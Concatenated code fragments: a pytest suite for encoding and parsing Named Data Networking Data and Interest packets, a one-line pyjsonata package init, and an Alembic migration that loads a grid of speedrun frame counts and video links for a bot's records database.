                b'\x16\x03\x1b\x01\x00'
                b'\x17 \x94\xe9\xda\x91\x1a\x11\xfft\x02i:G\x0cO\xdd!'
                b'\xe0\xc7\xb6\xfd\x8f\x9cn\xc5\x93{\x93\x04\xe0\xdf\xa6S')
        name = '/local/ndn/prefix'
        meta_info = MetaInfo()
        data = make_data(name, meta_info)
        assert (data ==
                b"\x06\x1b\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
                b"\x14\x03\x18\x01\x00")
        name = '/E'
        meta_info = MetaInfo()
        meta_info.content_type = None
        data = make_data(name, meta_info, b'', signer=DigestSha256Signer())
        assert data == bytes.fromhex("0630 0703080145"
                                     "1400 1500 16031b0100"
                                     "1720f965ee682c6973c3cbaa7b69e4c7063680f83be93a46be2ccc98686134354b66")

    @staticmethod
    def test_meta_info():
        name = '/local/ndn/prefix/37=%00'
        meta_info = MetaInfo()
        meta_info.content_type = ContentType.BLOB
        meta_info.freshness_period = 1000
        meta_info.final_block_id = Component.from_sequence_num(2)
        data = make_data(name, meta_info, signer=DigestSha256Signer())
        assert (data ==
                b"\x06\x4e\x07\x17\x08\x05local\x08\x03ndn\x08\x06prefix\x25\x01\x00"
                b"\x14\x0c\x18\x01\x00\x19\x02\x03\xe8\x1a\x03\x25\x01\x02"
                b"\x16\x03\x1b\x01\x00"
                b"\x17 \x03\xb8,\x18\xffMw\x84\x86\xa5a\x94e\xcc\xdaQ\x15\xb7\xfb\x19\xab\x9d1lw\'\xdf\xac\x03#\xcad")

    @staticmethod
    def test_shrink_signature():
        class ShrinkSigner(Signer):
            def write_signature_info(self, signature_info):
                pass

            def get_signature_value_size(self) -> int:
                return 10

            def write_signature_value(self, wire: VarBinaryStr, contents: List[VarBinaryStr]) -> int:
                return 5

        name = '/test'
        meta_info = MetaInfo(content_type=ContentType.BLOB)
        data = make_data(name, meta_info, signer=ShrinkSigner())
        assert data == b'\x06\x16\x07\x06\x08\x04test\x14\x03\x18\x01\x00\x16\x00\x17\x05\x00\x00\x00\x00\x00'
class TestInterestParse:
    @staticmethod
    def test_default():
        interest = b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'
        name, params, app_params, sig = parse_interest(interest)
        assert name == Name.from_str('/local/ndn/prefix')
        assert app_params is None
        assert not params.can_be_prefix
        assert not params.must_be_fresh
        assert params.nonce is None
        assert params.lifetime == 4000
        assert params.hop_limit is None
        assert sig.signature_info is None
        assert sig.signature_value_buf is None
        assert sig.digest_value_buf is None

    @staticmethod
    def test_params():
        interest = (b'\x05\x26\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
                    b'\x21\x00\x12\x00\x0a\x04\x00\x00\x00\x00\x0c\x01\x0a\x22\x01\x01')
        name, params, app_params, sig = parse_interest(interest)
        assert name == Name.from_str('/local/ndn/prefix')
        assert app_params is None
        assert params.can_be_prefix
        assert params.must_be_fresh
        assert params.nonce == 0
        assert params.lifetime == 10
        assert params.hop_limit == 1
        assert sig.signature_info is None
        assert sig.signature_value_buf is None
        assert sig.digest_value_buf is None

    @staticmethod
    def test_app_param():
        interest = (b'\x05\x42\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
                    b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
                    b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10'
                    b'\x0c\x02\x0f\xa0\x24\x04\x01\x02\x03\x04')
        name, params, app_params, sig = parse_interest(interest)
        assert name == Name.from_str('/local/ndn/prefix'
                                     '/params-sha256=47756f21fe0ee265149aa2be3c63c538a72378e9b0a58b39c5916367d35bda10')
        assert app_params == b'\x01\x02\x03\x04'
        assert not params.can_be_prefix
        assert not params.must_be_fresh
        assert params.nonce is None
        assert params.lifetime == 4000
        assert params.hop_limit is None
        assert sig.signature_info is None
        algo = hashlib.sha256()
        algo.update(b'\x24\x04\x01\x02\x03\x04')
        assert Component.get_value(name[-1]) == algo.digest()
        algo = hashlib.sha256()
        for part in sig.digest_covered_part:
            algo.update(part)
        assert sig.digest_value_buf == algo.digest()

    @staticmethod
    def test_signed_interest_1():
        interest = (b'\x05\x6f\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
                    b'\x02 \x8e\x6e\x36\xd7\xea\xbc\xde\x43\x75\x61\x40\xc9\x0b\xda\x09\xd5'
                    b'\x00\xd2\xa5\x77\xf2\xf5\x33\xb5\x69\xf0\x44\x1d\xf0\xa7\xf9\xe2'
                    b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
                    b'\x24\x04\x01\x02\x03\x04'
                    b'\x2c\x03\x1b\x01\x00'
                    b'\x2e \xea\xa8\xf0\x99\x08\x63\x78\x95\x1d\xe0\x5f\xf1\xde\xbb\xc1\x18'
                    b'\xb5\x21\x8b\x2f\xca\xa0\xb5\x1d\x18\xfa\xbc\x29\xf5\x4d\x58\xff')
        name, params, app_params, sig = parse_interest(interest)
        assert name == Name.from_str("/local/ndn/prefix"
                                     "/params-sha256=8e6e36d7eabcde43756140c90bda09d500d2a577f2f533b569f0441df0a7f9e2")
        assert params.nonce == 0x6c211166
        assert app_params == b'\x01\x02\x03\x04'
        assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
        algo = hashlib.sha256()
        for part in sig.digest_covered_part:
            algo.update(part)
        assert sig.digest_value_buf == algo.digest()
        algo = hashlib.sha256()
        for part in sig.signature_covered_part:
            algo.update(part)
        assert sig.signature_value_buf == algo.digest()

    @staticmethod
    def test_signed_interest_2():
        interest = (b'\x05\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
                    b'\x02 \x40\x77\xa5\x70\x49\xd8\x38\x48\xb5\x25\xa4\x23\xab\x97\x8e\x64'
                    b'\x80\xf9\x6d\x5c\xa3\x8a\x80\xa5\xe2\xd6\xe2\x50\xa6\x17\xbe\x4f'
                    b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
                    b'\x24\x00'
                    b'\x2c\x03\x1b\x01\x00'
                    b'\x2e \x09\x4e\x00\x9d\x74\x59\x82\x5c\xa0\x2d\xaa\xb7\xad\x60\x48\x30'
                    b'\x39\x19\xd8\x99\x80\x25\xbe\xff\xa6\xf9\x96\x79\xd6\x5e\x9f\x62')
        name, params, app_params, sig = parse_interest(interest)
        assert name == Name.from_str("/local/ndn/prefix"
                                     "/params-sha256=4077a57049d83848b525a423ab978e6480f96d5ca38a80a5e2d6e250a617be4f")
        assert params.nonce == 0x6c211166
        assert app_params == b''
        assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
        algo = hashlib.sha256()
        for part in sig.digest_covered_part:
            algo.update(part)
        assert sig.digest_value_buf == algo.digest()
        algo = hashlib.sha256()
        for part in sig.signature_covered_part:
            algo.update(part)
        assert sig.signature_value_buf == algo.digest()

    @staticmethod
    def test_throws():
        with pytest.raises(IndexError):
            parse_interest(b'\x05\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix', True)
        with pytest.raises(IndexError):
            parse_interest(b'\x05\x6b\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix', True)
        with pytest.raises(ValueError):
            parse_interest(b'\x06\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix', True)
        with pytest.raises(DecodeError):
            parse_interest(b'\x01\x00', False)
class TestDataParse:
    @staticmethod
    def test_default_1():
        data = (b"\x06\x42\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
                b"\x14\x03\x18\x01\x00"
                b"\x16\x03\x1b\x01\x00"
                b"\x17 \x7f1\xe4\t\xc5z/\x1d\r\xdaVh8\xfd\xd9\x94"
                b"\xd8\'S\x13[\xd7\x15\xa5\x9d%^\x80\xf2\xab\xf0\xb5")
        name, meta_info, content, sig = parse_data(data)
        assert name == Name.from_str("/local/ndn/prefix")
        assert meta_info.content_type == ContentType.BLOB
        assert meta_info.freshness_period is None
        assert meta_info.final_block_id is None
        assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
        assert content is None
        algo = hashlib.sha256()
        for part in sig.signature_covered_part:
            algo.update(part)
        assert sig.signature_value_buf == algo.digest()

    @staticmethod
    def test_default_2():
        data = (b'\x06L\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
                b'\x14\x03\x18\x01\x00'
                b'\x15\x0801020304'
                b'\x16\x03\x1b\x01\x00'
                b'\x17 \x94\xe9\xda\x91\x1a\x11\xfft\x02i:G\x0cO\xdd!'
                b'\xe0\xc7\xb6\xfd\x8f\x9cn\xc5\x93{\x93\x04\xe0\xdf\xa6S')
        name, meta_info, content, sig = parse_data(data)
        assert name == Name.from_str("/local/ndn/prefix")
        assert meta_info.content_type == ContentType.BLOB
        assert meta_info.freshness_period is None
        assert meta_info.final_block_id is None
        assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
        assert content == b'01020304'
        algo = hashlib.sha256()
        for part in sig.signature_covered_part:
            algo.update(part)
        assert sig.signature_value_buf == algo.digest()

    @staticmethod
    def test_default_3():
        data = (b"\x06\x1b\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
                b"\x14\x03\x18\x01\x00")
        name, meta_info, content, sig = parse_data(data)
        assert name == Name.from_str("/local/ndn/prefix")
        assert meta_info.content_type == ContentType.BLOB
        assert meta_info.freshness_period is None
        assert meta_info.final_block_id is None
        assert sig.signature_info is None
        assert content is None
        assert sig.signature_value_buf is None

    @staticmethod
    def test_default_4():
        data = bytes.fromhex("0630 0703080145"
                             "1400 1500 16031b0100"
                             "1720f965ee682c6973c3cbaa7b69e4c7063680f83be93a46be2ccc98686134354b66")
        name, meta_info, content, sig = parse_data(data)
        assert name == Name.from_str("/E")
        assert meta_info.content_type is None
        assert meta_info.freshness_period is None
        assert meta_info.final_block_id is None
        assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
        assert content == b''
        algo = hashlib.sha256()
        for part in sig.signature_covered_part:
            algo.update(part)
        assert sig.signature_value_buf == algo.digest()

    @staticmethod
    def test_meta_info():
        data = (b"\x06\x4e\x07\x17\x08\x05local\x08\x03ndn\x08\x06prefix\x25\x01\x00"
                b"\x14\x0c\x18\x01\x00\x19\x02\x03\xe8\x1a\x03\x25\x01\x02"
                b"\x16\x03\x1b\x01\x00"
                b"\x17 \x03\xb8,\x18\xffMw\x84\x86\xa5a\x94e\xcc\xdaQ\x15\xb7\xfb\x19\xab\x9d1lw\'\xdf\xac\x03#\xcad")
        name, meta_info, content, sig = parse_data(data)
        assert name == Name.from_str("/local/ndn/prefix/37=%00")
        assert meta_info.content_type == ContentType.BLOB
        assert meta_info.freshness_period == 1000
        assert meta_info.final_block_id == Component.from_sequence_num(2)
        assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
        assert content is None
        algo = hashlib.sha256()
        for part in sig.signature_covered_part:
            algo.update(part)
        assert sig.signature_value_buf == algo.digest()
# --- pyjsonata/__init__.py (qlyoung/pyjsonata, MIT) ---
] | 1 | 2021-08-28T21:15:10.000Z | 2021-08-28T21:15:10.000Z | from .pyjsonata import jsonata, PyjsonataError
# --- alembic/versions/554365813a89_add_25x25_records.py (mchen91/mismatch-bot, MIT) ---
Revision ID: 554365813a89
Revises: a67c2dc410d2
Create Date: 2021-02-15 20:36:37.952280
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "554365813a89"
down_revision = "a67c2dc410d2"
branch_labels = None
depends_on = None
def upgrade():
    from models import Character, Stage
    from use_cases.aliases import add_char_stage_alias, add_player_alias
    from use_cases.character import get_character_by_name
    from use_cases.player import get_player_by_name
    from use_cases.records import add_record, get_record
    from use_cases.stage import get_stage_by_name

    connection = op.get_bind()
    Session = sa.orm.sessionmaker()
    session = Session(bind=connection)

    frames_raw = """787 583 215 485 570 530 502 559 227 455 716 746 797 623 581 476 441 0 472 651 0 283 193 536 379
848 477 178 490 512 521 478 532 227 445 660 735 659 567 507 398 416 559 436 646 805 299 178 534 400
765 680 193 533 674 602 504 563 236 465 683 712 681 761 691 641 507 0 550 755 733 337 209 644 413
1045 709 238 489 656 0 567 641 290 580 828 902 872 687 681 624 547 0 510 765 0 449 232 695 412
875 734 209 594 568 674 576 678 231 504 642 962 897 687 497 419 552 1077 546 799 555 364 182 683 420
835 634 173 483 593 433 501 574 246 446 703 772 761 587 547 452 465 0 458 631 0 338 205 580 435
967 732 239 560 598 0 503 669 301 513 751 877 824 651 675 671 409 0 535 717 790 407 193 681 398
786 630 221 476 542 549 400 445 235 466 572 718 697 644 484 539 384 895 379 559 0 356 149 525 355
0 899 255 582 851 598 631 703 282 587 819 1096 954 763 706 768 597 0 705 831 0 458 178 688 487
469 343 147 419 420 414 333 357 230 298 402 599 391 516 448 448 282 0 315 496 371 262 117 502 283
478 346 93 377 360 365 225 281 227 366 384 688 412 571 430 454 239 0 308 422 305 237 101 412 318
1018 720 235 511 627 586 572 665 289 552 759 779 825 670 642 427 532 0 553 764 987 407 197 715 517
1017 589 239 595 684 0 499 653 287 511 763 864 582 688 616 543 531 0 560 707 0 414 197 506 421
1077 797 261 641 646 702 631 719 252 492 725 959 896 689 716 630 551 0 571 831 749 478 244 763 478
598 520 178 503 445 529 495 529 227 444 517 682 660 659 453 346 430 684 432 654 559 330 145 538 392
927 530 196 560 475 501 499 574 243 479 651 754 613 605 673 360 414 819 535 593 969 396 173 492 402
527 383 157 307 379 356 405 407 210 237 415 482 574 320 330 340 210 732 328 400 402 242 123 418 327
433 349 147 316 295 298 359 359 203 234 360 359 535 287 289 284 227 291 248 309 274 246 115 357 320
870 583 193 479 436 449 522 478 239 411 563 592 736 459 419 381 449 670 328 477 886 297 170 595 433
658 452 191 447 385 434 448 394 223 346 468 550 564 425 419 359 345 0 327 410 529 281 146 476 317
1054 729 237 567 659 649 599 695 272 512 706 973 942 647 679 733 544 1108 522 816 440 418 235 655 505
692 580 202 468 476 499 475 501 239 400 512 688 691 582 500 474 407 640 406 603 682 273 148 539 317
776 573 223 501 527 480 501 538 231 415 531 698 683 614 571 430 442 0 433 661 0 345 169 604 309
890 599 215 517 567 525 522 567 216 447 583 790 779 623 535 572 456 0 419 613 779 354 172 497 357
940 623 206 477 534 564 520 595 218 479 598 829 776 590 578 568 465 0 446 699 0 297 188 586 317"""
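The `frames_raw` block above is a 25x25 grid of whitespace-separated frame counts, with `0` apparently marking a cell that has no record. As a minimal sketch of how such a grid can be split into rows of optional integers (the `parse_grid` helper name and the 0-means-missing convention are assumptions, not part of the migration):

```python
# Illustrative helper (hypothetical name): split raw grid text into rows
# of ints, mapping 0 to None to represent "no record" cells.
def parse_grid(raw):
    return [[int(cell) or None for cell in line.split()]
            for line in raw.strip().split("\n")]

# Small sample mirroring the shape of frames_raw rows.
sample = "787 583 0\n848 477 178"
print(parse_grid(sample))  # [[787, 583, None], [848, 477, 178]]
```

Pairing this row-major grid with the matching cell of `videos_raw` below (where `N/A` plays the same missing-value role) would then be a simple `zip` over the two parsed grids.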
    videos_raw = """https://www.youtube.com/watch?v=7lNtSq50NHo https://www.youtube.com/watch?v=GK6WgnNKphg https://www.youtube.com/watch?v=gXTQLU1R_zM https://www.youtube.com/watch?v=7trfinFysLM https://www.youtube.com/watch?v=tO0qBNqH7jk https://www.youtube.com/watch?v=JzZMKfg31Fk https://www.youtube.com/watch?v=Hdain4KDv1c https://www.youtube.com/watch?v=QfwvRxLdIas https://www.youtube.com/watch?v=t7hkK2BIYzI https://www.youtube.com/watch?v=Padr42zMsoA https://www.youtube.com/watch?v=TC4zYAfGB4o https://www.youtube.com/watch?v=Plm_5O1U758 https://www.youtube.com/watch?v=qHkZlc6Fcc8 https://www.youtube.com/watch?v=6mvzq1PHzVk https://www.youtube.com/watch?v=83mWk3B5t3g https://www.youtube.com/watch?v=pIM8YkTmins https://www.youtube.com/watch?v=S71m5M2415o N/A https://www.youtube.com/watch?v=zZNxMHF58w8 https://www.youtube.com/watch?v=JgMPbTdpH54 N/A https://www.youtube.com/watch?v=2QlRgSg9amo https://www.youtube.com/watch?v=IRwawQr3drU https://www.youtube.com/watch?v=148P8iGfRa4 https://www.youtube.com/watch?v=2M5iHK9BGZA
https://www.youtube.com/watch?v=2rgQIgweCjE https://www.youtube.com/watch?v=L52InTj1kuk https://www.youtube.com/watch?v=YXmqV-0Nul4 https://www.youtube.com/watch?v=tTLkWqOkJzk https://www.youtube.com/watch?v=JTObCroXehU https://www.youtube.com/watch?v=WzouRoday0A https://www.youtube.com/watch?v=4Jd8dZM5x6w https://www.youtube.com/watch?v=2rgQIgweCjE&t=86s https://www.youtube.com/watch?v=ehb07oFyqq4 https://www.youtube.com/watch?v=QCwS7QpNn_c https://www.youtube.com/watch?v=2rgQIgweCjE&t=117s https://www.youtube.com/watch?v=2rgQIgweCjE&t=131s https://www.youtube.com/watch?v=aaw2Dk1MlzU https://www.youtube.com/watch?v=2rgQIgweCjE&t=161s https://www.youtube.com/watch?v=csanzdqk9yw https://www.youtube.com/watch?v=2rgQIgweCjE&t=187s https://www.youtube.com/watch?v=qkLSr1hJ0CA https://www.youtube.com/watch?v=c4KEM3GRxP8 https://www.youtube.com/watch?v=oe9UCF1fBoU https://www.youtube.com/watch?v=J7kjLMKTO_0 https://www.youtube.com/watch?v=FqwkV6OCPZM https://www.youtube.com/watch?v=L_bwf1meXKo https://www.youtube.com/watch?v=2rgQIgweCjE&t=258s https://www.youtube.com/watch?v=6PE3q6AGfXo https://www.youtube.com/watch?v=nT80gNrRnEM
https://www.youtube.com/watch?v=h9jcb-caI44 https://www.youtube.com/watch?v=wf7ckXdRvkc https://www.youtube.com/watch?v=kq1zJoKxkuM https://www.youtube.com/watch?v=T2-QWhm_KO8 https://www.youtube.com/watch?v=TR4JeyFO65I https://www.youtube.com/watch?v=xkQyKYnJaVw https://www.youtube.com/watch?v=QAnC52S3Li0 https://www.youtube.com/watch?v=uLnoFHbx90U https://www.youtube.com/watch?v=Odh_hv3FOSw https://www.youtube.com/watch?v=Cg36tDpAtiY https://www.youtube.com/watch?v=NfgAOYlivY0 https://www.youtube.com/watch?v=1ccgDvUIRkU https://www.youtube.com/watch?v=apDrTBAd8Zo https://www.youtube.com/watch?v=kxXEQS3992k https://www.youtube.com/watch?v=5pXOjN_WXtk https://www.youtube.com/watch?v=NMfDruGBpgY https://www.youtube.com/watch?v=lhuunJmmGLY N/A https://www.youtube.com/watch?v=DlLHFO3W2aw https://www.youtube.com/watch?v=zxbx1SokDsY https://www.youtube.com/watch?v=fFwaesMfFYA https://www.youtube.com/watch?v=UH-V4_0R62s https://www.youtube.com/watch?v=p8QXSRfoMJQ https://www.youtube.com/watch?v=gbnlzFKktBE https://www.youtube.com/watch?v=fwZpr9loTX0
https://www.youtube.com/watch?v=I-DXEZ_JHBQ https://www.youtube.com/watch?v=ZqyaclFr6i0 https://www.youtube.com/watch?v=-hG10yxiJeY https://www.youtube.com/watch?v=tR3Hq2f8oUY https://www.youtube.com/watch?v=9bzp5ymWFvc N/A https://www.youtube.com/watch?v=YxY1BtzyTiU https://youtu.be/Zn5mEFUbvCg?t=79 https://www.youtube.com/watch?v=0uf9cYMU1_w https://www.youtube.com/watch?v=BV0xMF8fV8M https://www.youtube.com/watch?v=LX2yjAZ12Xw https://www.youtube.com/watch?v=0qFfzvkykQQ https://www.youtube.com/watch?v=hCzW_DWegsk https://www.youtube.com/watch?v=EgISgvRdFQ0 https://www.youtube.com/watch?v=YZXgJJvryrw https://www.youtube.com/watch?v=dhNYnf2Bu9U https://www.youtube.com/watch?v=Cej1SpLnmgk N/A https://www.youtube.com/watch?v=-KbraYVPeeI https://www.youtube.com/watch?v=dwCZDvWN1CQ N/A https://www.youtube.com/watch?v=T8kFuqrjk1s https://www.youtube.com/watch?v=jrQ67YVLAa0 https://www.youtube.com/watch?v=HpR42mNRwkA https://www.youtube.com/watch?v=QVVkqIADIwk
https://www.youtube.com/watch?v=UPGtWfHZhKg https://www.youtube.com/watch?v=sBs3MdNDelM https://youtu.be/lfPxiK2CbMY?t=19 https://www.youtube.com/watch?v=R2GkTMiD8IQ https://www.youtube.com/watch?v=kVaG0PSzmrQ https://youtu.be/2Sj9wV8jlOw?t=42 https://www.youtube.com/watch?v=68qK07bYzp0 https://www.youtube.com/watch?v=r3lCx90q1PQ https://www.youtube.com/watch?v=Lo5nNJ4d9LA https://www.youtube.com/watch?v=bgP709-h6bY https://www.youtube.com/watch?v=LQLPWJHxels https://www.youtube.com/watch?v=0d14RZjO6v8 https://www.youtube.com/watch?v=QuxhHmWHQ1k https://www.youtube.com/watch?v=iJBP7gF50fs https://www.youtube.com/watch?v=JfQZAtQodXE https://www.youtube.com/watch?v=RRweGBqCmfA https://www.youtube.com/watch?v=_FxLF4n1uxw https://www.youtube.com/watch?v=f4n3KUQNSJQ https://www.youtube.com/watch?v=OP5Kc0hGfVo https://www.youtube.com/watch?v=K1MLGUo0iBE https://www.youtube.com/watch?v=iSAPQSJ7jzA https://www.youtube.com/watch?v=palz2WH4FGs https://www.youtube.com/watch?v=yJ2oC3pZstk https://www.youtube.com/watch?v=3oaTTEpPJO0 https://www.youtube.com/watch?v=YBCYY6R5DTk
https://www.youtube.com/watch?v=Yqip3A6pjtU https://www.youtube.com/watch?v=xUH0sv4f6z0 https://www.youtube.com/watch?v=3hsJqLkR_rE https://www.youtube.com/watch?v=gILlUUpBvbI https://www.youtube.com/watch?v=rTz0LJnr2W4 https://www.youtube.com/watch?v=LXUBF0GuWfQ https://www.youtube.com/watch?v=nowBl_q5w3w https://www.youtube.com/watch?v=AkWER7zd4_8 https://www.youtube.com/watch?v=BqaF4jp7mMw https://www.youtube.com/watch?v=C_SMwS0bLRo https://www.youtube.com/watch?v=LExTlb9mgbs https://www.youtube.com/watch?v=ZUK1tTETDTQ https://www.youtube.com/watch?v=Xd-FhyQpeDQ https://www.youtube.com/watch?v=I6_eaxG6Sj0 https://www.youtube.com/watch?v=mVrlS0Uq0F4 https://www.youtube.com/watch?v=HZCf-yzFEr4 https://www.youtube.com/watch?v=Ty0QLiGXpx4 N/A https://www.youtube.com/watch?v=Ktw0FaCM3nY https://www.youtube.com/watch?v=5DdtGLEIOmQ N/A https://www.youtube.com/watch?v=fMuFutsHURA https://www.youtube.com/watch?v=yJUi2Lt2rnA https://www.youtube.com/watch?v=fjnupMz0wD8 https://www.youtube.com/watch?v=XMj5cLxJ4xQ
https://www.youtube.com/watch?v=29LYgrs1eII https://www.youtube.com/watch?v=_juZKSyxql8 https://www.youtube.com/watch?v=yrId2C7fKh8 https://www.youtube.com/watch?v=5gPEyNGnWek https://www.youtube.com/watch?v=puogjWK5WfA N/A https://www.youtube.com/watch?v=ccpa4hs66OU https://www.youtube.com/watch?v=LqOBzY4EYgQ https://www.youtube.com/watch?v=pxJ50Nskl4s https://www.youtube.com/watch?v=OasN_u0LJmY https://www.youtube.com/watch?v=21Vws7YtID8 https://www.youtube.com/watch?v=yI4dxZlHJ1A https://www.youtube.com/watch?v=RRk5hVCAoJY https://www.youtube.com/watch?v=5RiFtW3xFdM https://www.youtube.com/watch?v=xxO6r62YJnk https://www.youtube.com/watch?v=2FjR67n9ysI https://www.youtube.com/watch?v=ECqul0Vlo1U N/A https://www.youtube.com/watch?v=NipcJuOwgKo https://www.youtube.com/watch?v=FmZKXjyMzio https://www.youtube.com/watch?v=1yq6HgRg0Bw https://www.youtube.com/watch?v=l9bnFpBXRhw https://www.youtube.com/watch?v=84O0J_uIHpk https://www.youtube.com/watch?v=PYaRrj8pcbY https://www.youtube.com/watch?v=3ioB6TJeKRY
https://www.youtube.com/watch?v=gPe3QAFAgOU https://www.youtube.com/watch?v=we9H0CyTp58 https://www.youtube.com/watch?v=c57m0czMHHI https://www.youtube.com/watch?v=d9CKW7jtI24 https://www.youtube.com/watch?v=q7OEwKuFs-E https://www.youtube.com/watch?v=p48NWkK2RPk https://www.youtube.com/watch?v=M9wV6pMKG_k https://www.youtube.com/watch?v=6uGEDxKbu1w https://www.youtube.com/watch?v=jl2qghtfnRo https://www.youtube.com/watch?v=MMB1YsKCfJw https://www.youtube.com/watch?v=vVfDpTKWwro https://www.youtube.com/watch?v=LO25pcSYCc0 https://www.youtube.com/watch?v=E3XWQrpcPYg https://www.youtube.com/watch?v=AJbafmGwraA https://www.youtube.com/watch?v=A66GKrSYjxM https://www.youtube.com/watch?v=imdLBefxYcs https://www.youtube.com/watch?v=XQeN18rv1mo https://www.youtube.com/watch?v=Bu73VOrFqz8 https://www.youtube.com/watch?v=v_MbEm6Nyqg https://www.youtube.com/watch?v=BKpI5VBlmSc N/A https://www.youtube.com/watch?v=HJ9iX6toMDo https://www.youtube.com/watch?v=HYWTFrTfNDw https://www.youtube.com/watch?v=IljCXdUUQRo https://www.youtube.com/watch?v=-YN1ZcMb0_U
N/A https://www.youtube.com/watch?v=TjogMhf8B7Y https://www.youtube.com/watch?v=bpqc3Zy157o https://www.youtube.com/watch?v=sTloshZcUbs https://www.youtube.com/watch?v=UCxyj944HqA https://www.youtube.com/watch?v=z3RhaMc7SdI https://www.youtube.com/watch?v=0ShqNSAnuBo https://www.youtube.com/watch?v=tcMIwUdiPhc https://www.youtube.com/watch?v=lFBiydeaIVM https://www.youtube.com/watch?v=Qpz7J44-QIs https://www.youtube.com/watch?v=r2mWJLJGTXg https://www.youtube.com/watch?v=xDHhIcZ3CNo https://www.youtube.com/watch?v=6Y2xHDsTczU https://www.youtube.com/watch?v=wuQU5wNWIsE https://www.youtube.com/watch?v=KXJ8w0LVP00 https://www.youtube.com/watch?v=t8YwyDxr2DQ https://www.youtube.com/watch?v=6MxkFFVV5aQ N/A https://www.youtube.com/watch?v=WIwihIUAWG0 https://www.youtube.com/watch?v=0ow8SvCRbdQ N/A https://www.youtube.com/watch?v=Y0pmJWZiIio https://www.youtube.com/watch?v=iKeyT_zLzxc https://www.youtube.com/watch?v=ZpzPxFPTFZE https://www.youtube.com/watch?v=S4Yv0ZBDnl4
https://www.youtube.com/watch?v=zEP0HECDd8Q https://www.youtube.com/watch?v=DXtP1gZmxq4 https://www.youtube.com/watch?v=OxUKz642jUA https://www.youtube.com/watch?v=DQekC1MukdM https://www.youtube.com/watch?v=9IJ-prLWQEQ https://www.youtube.com/watch?v=9GNcToGckuY https://www.youtube.com/watch?v=EBl8LHB5-bw https://www.youtube.com/watch?v=3RjNcTqHTV8 https://www.youtube.com/watch?v=JWnrETRYK2c https://www.youtube.com/watch?v=zqTCZYpz_dI https://www.youtube.com/watch?v=0VQ2aBCQZ-Y https://www.youtube.com/watch?v=5zqwUrh2EgU https://clips.twitch.tv/CrackyCrazyCobraGivePLZ https://www.youtube.com/watch?v=1gmyZVrYlP4 https://www.youtube.com/watch?v=JWeoWYG5Yq4 https://www.youtube.com/watch?v=mKHcmBkIcQM https://www.youtube.com/watch?v=XkP2VcgSiYs N/A https://www.youtube.com/watch?v=_pAqKwF-1XU https://www.youtube.com/watch?v=DY6XPg9x964 https://www.youtube.com/watch?v=77CKIoZWeKE https://www.youtube.com/watch?v=b7iLcHOo3uo https://www.youtube.com/watch?v=YEvTu9cBi18 https://www.youtube.com/watch?v=vV_c9Gyg61g https://www.youtube.com/watch?v=cMj9-LjBPB4
https://www.youtube.com/watch?v=2Wegc81UTFk https://www.youtube.com/watch?v=2-4HZYlF2_g https://www.youtube.com/watch?v=7dab8S8bkEs https://www.youtube.com/watch?v=A3avQubJdgQ https://www.youtube.com/watch?v=fwlqP5DbowI https://www.youtube.com/watch?v=h8EqU_a3SNw https://www.youtube.com/watch?v=_Ig3c-gTrtk https://www.youtube.com/watch?v=pgJGw6NNcow https://www.youtube.com/watch?v=aa4hZGnlUTk https://www.youtube.com/watch?v=vpVr2gNSGyU https://www.youtube.com/watch?v=gh7vZBbvMlw https://www.youtube.com/watch?v=cxx9GWQn3sQ https://www.youtube.com/watch?v=O6C3JxrBWWY https://www.youtube.com/watch?v=RsBVzW3bsNM https://www.youtube.com/watch?v=svlAmr5nyFU https://www.youtube.com/watch?v=SHv4ipl2r4k https://www.youtube.com/watch?v=QsNHhlSaAP8 N/A https://clips.twitch.tv/CooperativeMoralLyrebirdCmonBruh https://www.youtube.com/watch?v=PvOkh9kXDds https://www.youtube.com/watch?v=YuZ8V4hCI_I https://www.youtube.com/watch?v=GEknDriZCms https://www.youtube.com/watch?v=0lf8NaZEl0E https://www.youtube.com/watch?v=UnMGCwXSQdk https://www.youtube.com/watch?v=xcn1vMKLieo
https://www.youtube.com/watch?v=RhqI18DyoqY https://www.youtube.com/watch?v=YvfVVCaXI1w https://www.youtube.com/watch?v=Yh92EyrD1-M https://www.youtube.com/watch?v=8IOg0q_0cEY https://www.youtube.com/watch?v=kFLJMFtqnOw https://www.youtube.com/watch?v=tOm6wf76hkE https://www.youtube.com/watch?v=SMpMr9AzOjE https://www.youtube.com/watch?v=22pnF1JC_Lo https://www.youtube.com/watch?v=rU1kgImEGtE https://www.youtube.com/watch?v=n4y4-v3rpRc https://www.youtube.com/watch?v=0RmEeVKLo0U https://www.youtube.com/watch?v=ztuOokjPXlU https://www.youtube.com/watch?v=UjW8HAhZZcY https://www.youtube.com/watch?v=lp-DLoiX024 https://www.youtube.com/watch?v=F8PUWk2-X5I https://www.youtube.com/watch?v=wulz27Bksfo https://www.youtube.com/watch?v=Izz9AmS-88Q N/A https://www.youtube.com/watch?v=OwY8SH45B7I https://www.youtube.com/watch?v=nZIFHR1FJ4g https://www.youtube.com/watch?v=5u8S5q-ix84 https://www.youtube.com/watch?v=9Ls4uQwfX1Y https://www.youtube.com/watch?v=BOLdP0hWvEI https://www.youtube.com/watch?v=UJNEmnMYmXA 